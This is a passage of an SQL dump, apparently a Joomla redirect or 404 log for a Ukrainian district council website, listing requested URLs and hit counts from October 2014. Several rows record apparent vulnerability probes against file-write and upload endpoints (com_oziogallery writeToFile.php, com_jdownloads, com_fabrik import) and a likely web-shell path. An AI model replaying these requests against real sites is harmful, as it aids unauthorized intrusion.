12:45:24','0000-00-00 00:00:00',301),(7650,'http://malyn-rayrada.org.ua/faq/faq/','','','',1,0,'2014-10-09 12:45:25','0000-00-00 00:00:00',301),(7651,'http://malyn-rayrada.org.ua/bay.php?p=vigodniynet&month=12&action=hosting','','','',1,0,'2014-10-09 12:45:31','0000-00-00 00:00:00',301),(7652,'http://malyn-rayrada.org.ua/windows/maximumnet/','','','',1,0,'2014-10-09 12:45:28','0000-00-00 00:00:00',301),(7653,'http://malyn-rayrada.org.ua/resseler/unixresseler/','','','',1,0,'2014-10-09 12:45:30','0000-00-00 00:00:00',301),(7654,'http://malyn-rayrada.org.ua/domain/ukr/','','','',1,0,'2014-10-09 12:45:30','0000-00-00 00:00:00',301),(7655,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=958:-2010-2015-&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-09 12:50:26','0000-00-00 00:00:00',301),(7656,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1236:2014-03-07-06-36-44&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-09 13:21:49','0000-00-00 00:00:00',301),(7657,'http://www.malyn-rayrada.org.ua/archive/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-09 13:38:39','0000-00-00 00:00:00',301),(7658,'http://www.malyn-rayrada.org.ua/archive/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-09 13:38:44','0000-00-00 00:00:00',301),(7659,'http://www.malyn-rayrada.org.ua/archive/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-09 13:38:52','0000-00-00 00:00:00',301),(7660,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1238:2014-03-09-06-41-00&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-09 13:49:36','0000-00-00 00:00:00',301),(7661,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=uk','','','',2,0,'2014-10-09 14:03:18','0000-00-00 00:00:00',301),(7662,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1316:2014-05-20-12-49-29&lang=ru&option=com_content&view=article','','http://go.mail.ru/search?q=%D0%B4%D1%96%D0%BB%D1%8C%D0%BD%D0%B8%D1%87%D0%BD%D1%96++%D0%B2%D0%B8%D0%B1%D0%BE%D1%80%D1%87%D1%96+%D0%B4%D0%B5%D0%BB%D1%8F','',4,0,'2014-10-09 14:19:30','0000-00-00 00:00:00',301),(7663,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=931:2013-02-21-09-14-48&catid=47:--21022013-&Itemid=86&lang=uk','','','',1,0,'2014-10-09 14:30:27','0000-00-00 00:00:00',301),(7664,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-09 14:33:31','0000-00-00 00:00:00',301),(7665,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=943:-qq&lang=en&option=com_content&view=article','','','',1,0,'2014-10-09 14:45:03','0000-00-00 00:00:00',301),(7666,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=890:2013-01-06-09-42-40&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-09 15:51:21','0000-00-00 00:00:00',301),(7667,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1055:2013-07-19-11-43-17&catid=51&Itemid=92&lang=uk','','','',18,0,'2014-10-09 16:09:40','0000-00-00 00:00:00',301),(7668,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=947:-----lr--2012-2015-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-09 16:50:31','0000-00-00 00:00:00',301),(7669,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-52-17','','https://www.google.com.ua/','',10,0,'2014-10-09 17:14:25','0000-00-00 00:00:00',301),(7670,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=971:-2012-&catid=49:--12042013-&Itemid=88&lang=en','','','',4,0,'2014-10-09 17:14:52','0000-00-00 00:00:00',301),(7671,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1264:2014-04-01-11-27-13&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-09 17:15:36','0000-00-00 00:00:00',301),(7672,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&id=3&lang=ru&option=com_phocagallery&view=category','','','',4,0,'2014-10-09 17:15:39','0000-00-00 00:00:00',301),(7673,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=971:-2012-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',4,0,'2014-10-09 18:11:48','0000-00-00 00:00:00',301),(7674,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1139:---------14112013--84-l--25-----6-r&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-09 18:18:22','0000-00-00 00:00:00',301),(7675,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-10-09 19:23:03','0000-00-00 00:00:00',301),(7676,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1195:2014-01-28-13-01-27&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-09 19:32:10','0000-00-00 00:00:00',301),(7677,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1040:2013-07-01-14-27-50&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-09 19:32:21','0000-00-00 00:00:00',301),(7678,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-10-09 19:41:02','0000-00-00 00:00:00',301),(7679,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:-2011-2015-&catid=51&Itemid=92&lang=ru','','','',2,0,'2014-10-09 20:09:16','0000-00-00 00:00:00',301),(7680,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:------------2011-2015-&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-10-09 20:10:08','0000-00-00 00:00:00',301),(7681,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1349:-31-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-09 20:11:32','0000-00-00 00:00:00',301),(7682,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=936:2013-02-21-09-43-43&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-09 20:32:14','0000-00-00 00:00:00',301),(7683,'http://www.malyn-rayrada.org.ua/index.php?Itemid=96&catid=55:--26122013-&id=1167:--------l-r-------&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-09 21:00:07','0000-00-00 00:00:00',301),(7684,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1304:2014-04-30-09-11-23&catid=58:--30042014-&Itemid=105&lang=ru','','','',15,0,'2014-10-09 21:20:41','0000-00-00 00:00:00',301),(7685,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1304:2014-04-30-09-11-23&catid=58&Itemid=105&lang=uk','','','',2,0,'2014-10-09 21:49:09','0000-00-00 00:00:00',301),(7686,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1304:2014-04-30-09-11-23&catid=58&Itemid=105&lang=ru','','','',6,0,'2014-10-09 21:56:03','0000-00-00 00:00:00',301),(7687,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=uk','','','',5,0,'2014-10-09 22:13:29','0000-00-00 00:00:00',301),(7688,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1304:2014-04-30-09-11-23&catid=58:--30042014-&Itemid=105&lang=uk','','','',3,0,'2014-10-09 22:24:16','0000-00-00 00:00:00',301),(7689,'http://www.malyn-rayrada.org.ua/index.php?Itemid=32&id=3&lang=ru&option=com_phocagallery&view=category','','','',3,0,'2014-10-09 22:30:38','0000-00-00 00:00:00',301),(7690,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1304:2014-04-30-09-11-23&catid=58:--30042014-&Itemid=105&lang=ru','','','',3,0,'2014-10-09 22:52:15','0000-00-00 00:00:00',301),(7691,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=853:2012-12-11-13-39-46&catid=32:2011-03-31-12-03-04&Itemid=64&lang=en','','','',12,0,'2014-10-09 23:48:03','0000-00-00 00:00:00',301),(7692,'http://www.malyn-rayrada.org.ua/sivut/components/com_community/index.html','','','',1,0,'2014-10-09 23:57:36','0000-00-00 00:00:00',301),(7693,'http://www.malyn-rayrada.org.ua/sivut/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-09 23:57:39','0000-00-00 00:00:00',301),(7694,'http://www.malyn-rayrada.org.ua/sivut/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-09 23:57:42','0000-00-00 00:00:00',301),(7695,'http://www.malyn-rayrada.org.ua/sivut/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-09 23:57:48','0000-00-00 00:00:00',301),(7696,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=971:-2012-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 00:36:31','0000-00-00 00:00:00',301),(7697,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=910:-22-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 01:59:06','0000-00-00 00:00:00',301),(7698,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1225:2014-02-24-13-27-21&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-10 02:33:54','0000-00-00 00:00:00',301),(7699,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1230:l-r&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-10 02:50:01','0000-00-00 00:00:00',301),(7700,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=928:2013-02-21-09-10-17&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-10 02:50:12','0000-00-00 00:00:00',301),(7701,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=938:---------------6612-------626-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 02:50:17','0000-00-00 00:00:00',301),(7702,'http://www.malyn-rayrada.org.ua/images/stories/indonesia.php?rf','','','',1,0,'2014-10-10 03:19:01','0000-00-00 00:00:00',301),(7703,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1024:----l---------2011-2014-r-&lang=ru&option=com_content&view=article','','','',5,0,'2014-10-10 03:23:59','0000-00-00 00:00:00',301),(7704,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=890:2014-01-06-08-19-15&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 03:35:44','0000-00-00 00:00:00',301),(7705,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1040:2013-07-01-14-27-50&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-10 04:08:56','0000-00-00 00:00:00',301),(7706,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1127:2013-11-05-12-58-04&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-10 04:30:09','0000-00-00 00:00:00',301),(7707,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1157:-11-2013-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-10 04:41:17','0000-00-00 00:00:00',301),(7708,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1130:2013-11-07-14-04-12&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-10 05:13:12','0000-00-00 00:00:00',301),(7709,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1268:---------------l-r&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-10 05:13:15','0000-00-00 00:00:00',301),(7710,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=15&id=1106:-qq&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 05:13:18','0000-00-00 00:00:00',301),(7711,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1145:2013-11-27-09-47-11&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 06:10:36','0000-00-00 00:00:00',301),(7712,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=934:---------6---16112010-5---------------&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 06:10:37','0000-00-00 00:00:00',301),(7713,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=999:2013-04-28-05-21-05&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-10 06:20:39','0000-00-00 00:00:00',301),(7714,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:----24----&catid=11&Itemid=14&lang=en','','','',1,0,'2014-10-10 06:40:12','0000-00-00 00:00:00',301),(7715,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-10-10 07:10:04','0000-00-00 00:00:00',301),(7716,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=939:-18-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-10 07:25:37','0000-00-00 00:00:00',301),(7717,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1308:2014-05-05-05-20-51&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-10 07:28:12','0000-00-00 00:00:00',301),(7718,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1021:-l-r&lang=uk&option=com_content&view=article','','','',6,0,'2014-10-10 07:47:34','0000-00-00 00:00:00',301),(7719,'http://www.malyn-rayrada.org.ua/index.php?Itemid=47&catid=21:2010-06-07-09-43-24&id=27:2010-06-07-11-05-24&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-10 07:47:36','0000-00-00 00:00:00',301),(7720,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1089:-l-r-&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-10 08:14:50','0000-00-00 00:00:00',301),(7721,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11&Itemid=14&lang=en','','','',2,0,'2014-10-10 08:58:29','0000-00-00 00:00:00',301),(7722,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-10-10 08:58:32','0000-00-00 00:00:00',301),(7723,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-10-10 08:58:34','0000-00-00 00:00:00',301),(7724,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-10-10 08:58:37','0000-00-00 00:00:00',301),(7725,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=963:2013-03-13-06-16-53&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-10 09:07:28','0000-00-00 00:00:00',301),(7726,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=947:-lr-2012-2015-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-10 09:39:43','0000-00-00 00:00:00',301),(7727,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1133:2013-11-14-07-12-22&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-10 09:39:45','0000-00-00 00:00:00',301),(7728,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1260:2014-03-31-11-32-51&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 09:46:39','0000-00-00 00:00:00',301),(7729,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1202:2014-01-31-07-45-54&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 09:46:41','0000-00-00 00:00:00',301),(7730,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1055:2013-07-19-11-43-17&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-10 09:46:42','0000-00-00 00:00:00',301),(7731,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15&lang=uk&Itemid=0','','','',9,0,'2014-10-10 09:53:55','0000-00-00 00:00:00',301),(7732,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15&lang=ru&Itemid=0','','','',5,0,'2014-10-10 09:55:11','0000-00-00 00:00:00',301),(7733,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1225:2014-02-24-13-27-21&lang=ru&option=com_content&view=article','','','',6,0,'2014-10-10 10:13:06','0000-00-00 00:00:00',301),(7734,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1213:2014-02-14-13-53-12&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 10:13:08','0000-00-00 00:00:00',301),(7735,'http://www.malyn-rayrada.org.ua/index.php?Itemid=64&catid=32&id=854:2012-12-11-13-40-55&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-10 10:19:27','0000-00-00 00:00:00',301),(7736,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1088:2013-09-19-12-06-07&lang=en&option=com_content&view=article','','','',4,0,'2014-10-10 11:22:08','0000-00-00 00:00:00',301),(7737,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=947:-lr-2012-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 11:26:10','0000-00-00 00:00:00',301),(7738,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1058:-2013-&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-10 11:55:58','0000-00-00 00:00:00',301),(7739,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=15&id=1106:-qq&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 11:56:07','0000-00-00 00:00:00',301),(7740,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1326:-100-547&lang=ru&option=com_content&view=article','','','',6,0,'2014-10-10 12:26:40','0000-00-00 00:00:00',301),(7741,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1332:2014-06-04-09-44-02&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-10 12:26:42','0000-00-00 00:00:00',301),(7742,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1032:-------l-r--2012-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 12:30:05','0000-00-00 00:00:00',301),(7743,'http://www.malyn-rayrada.org.ua/index.php?Itemid=87&catid=48:--11032013-&id=955:2013-03-07-06-31-04&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-10 12:30:16','0000-00-00 00:00:00',301),(7744,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1085:2013-09-11-12-15-54&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-10 12:30:31','0000-00-00 00:00:00',301),(7745,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1228:2014-02-27-14-42-41&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-10 13:00:49','0000-00-00 00:00:00',301),(7746,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-10 13:05:34','0000-00-00 00:00:00',301),(7747,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-10-10 13:20:46','0000-00-00 00:00:00',301),(7748,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1165:-2014-&lang=uk&option=com_content&view=article','','','',5,0,'2014-10-10 13:37:36','0000-00-00 00:00:00',301),(7749,'http://malyn-rayrada.org.ua/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',66,0,'2014-10-10 14:11:46','0000-00-00 00:00:00',301),(7750,'http://malyn-rayrada.org.ua/joomla1/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',2,0,'2014-10-10 14:11:53','0000-00-00 00:00:00',301),(7751,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1259:1&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 14:17:21','0000-00-00 00:00:00',301),(7752,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1055:2013-07-19-11-43-17&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 14:17:29','0000-00-00 00:00:00',301),(7753,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1060:2013-07-27-10-13-15&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-10 14:50:47','0000-00-00 00:00:00',301),(7754,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=896:2013-01-17-07-42-35&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-10 14:50:49','0000-00-00 00:00:00',301),(7755,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=948:-2012-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 15:14:52','0000-00-00 00:00:00',301),(7756,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=893:-2013-2014-&lang=ru&option=com_content&view=article','','','',5,0,'2014-10-10 15:14:54','0000-00-00 00:00:00',301),(7757,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=890:2013-01-06-09-42-40&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-10 15:14:56','0000-00-00 00:00:00',301),(7758,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1036:2013-06-25-10-02-48&tmpl=component&print=1&layout=default&page=&lang=uk','','','',3,0,'2014-10-10 15:25:33','0000-00-00 00:00:00',301),(7759,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1334:2014-06-06-05-54-20&tmpl=component&print=1&layout=default&page=&lang=ru','','','',2,0,'2014-10-10 15:25:58','0000-00-00 00:00:00',301),(7760,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1372:2014-08-04-19-26-16&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=14&lang=ru','','','',2,0,'2014-10-10 15:25:59','0000-00-00 00:00:00',301),(7761,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1038:2013-06-28-10-19-47&tmpl=component&print=1&layout=default&page=&lang=uk','','','',3,0,'2014-10-10 15:29:23','0000-00-00 00:00:00',301),(7762,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1040:2013-07-01-14-27-50&tmpl=component&print=1&layout=default&page=&lang=uk','','','',3,0,'2014-10-10 15:29:32','0000-00-00 00:00:00',301),(7763,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1046:-2013-&tmpl=component&print=1&layout=default&page=&lang=uk','','','',3,0,'2014-10-10 15:29:40','0000-00-00 00:00:00',301),(7764,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1056:-22-&tmpl=component&print=1&layout=default&page=&lang=uk','','','',2,0,'2014-10-10 15:29:49','0000-00-00 00:00:00',301),(7765,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1371:2014-08-04-19-11-42&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=14&lang=ru','','','',2,0,'2014-10-10 15:29:56','0000-00-00 00:00:00',301),(7766,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1375:-33-6-&tmpl=component&print=1&layout=default&page=&lang=uk','','','',2,0,'2014-10-10 15:29:57','0000-00-00 00:00:00',301),(7767,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1051:--------4------&catid=51&Itemid=92&lang=en','','','',3,0,'2014-10-10 15:30:11','0000-00-00 00:00:00',301),(7768,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1042:-qq-&tmpl=component&print=1&layout=default&page=&lang=uk','','','',5,0,'2014-10-10 15:36:29','0000-00-00 00:00:00',301),(7769,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1049:2013-07-15-05-50-46&tmpl=component&print=1&layout=default&page=&lang=uk','','','',3,0,'2014-10-10 15:36:30','0000-00-00 00:00:00',301),(7770,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1328:2014-06-01-11-58-56&tmpl=component&print=1&layout=default&page=&lang=ru','','','',2,0,'2014-10-10 15:36:32','0000-00-00 00:00:00',301),(7771,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1332:2014-06-04-09-44-02&tmpl=component&print=1&layout=default&page=&lang=ru','','','',2,0,'2014-10-10 15:36:39','0000-00-00 00:00:00',301),(7772,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1378:2014-08-27-11-29-34&tmpl=component&print=1&layout=default&page=&lang=uk','','','',2,0,'2014-10-10 15:36:46','0000-00-00 00:00:00',301),(7773,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1086:2013-09-16-13-00-16&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-10-10 15:40:18','0000-00-00 00:00:00',301),(7774,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1035:2013-06-25-09-55-31&tmpl=component&print=1&layout=default&page=&lang=uk','','','',5,0,'2014-10-10 15:45:59','0000-00-00 00:00:00',301),(7775,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1038:2013-06-28-10-19-47&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=14&lang=uk','','','',2,0,'2014-10-10 15:46:04','0000-00-00 00:00:00',301),(7776,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=893:-2013-2014-&catid=47&Itemid=86&lang=ru','','','',1,0,'2014-10-10 15:55:34','0000-00-00 00:00:00',301),(7777,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=893:-2013-2014-&catid=47:-21022013-&Itemid=86&lang=ru','','','',2,0,'2014-10-10 16:00:30','0000-00-00 00:00:00',301),(7778,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1115:-24-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-10 16:20:10','0000-00-00 00:00:00',301),(7779,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=991:2013-04-22-08-24-54&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-10 16:31:46','0000-00-00 00:00:00',301),(7780,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1266:2014-04-03-05-25-14&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-10 16:31:48','0000-00-00 00:00:00',301),(7781,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1263:2014-03-31-14-00-08&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 16:31:52','0000-00-00 00:00:00',301),(7782,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1104:-lr&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 16:31:54','0000-00-00 00:00:00',301),(7783,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:-2014-&catid=59&Itemid=107&lang=uk','','','',5,0,'2014-10-10 16:46:44','0000-00-00 00:00:00',301),(7784,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:-2014-&catid=59:--20062014-&Itemid=107&lang=ru','','','',14,0,'2014-10-10 17:15:03','0000-00-00 00:00:00',301),(7785,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-10-10 17:35:58','0000-00-00 00:00:00',301),(7786,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',14,0,'2014-10-10 17:44:55','0000-00-00 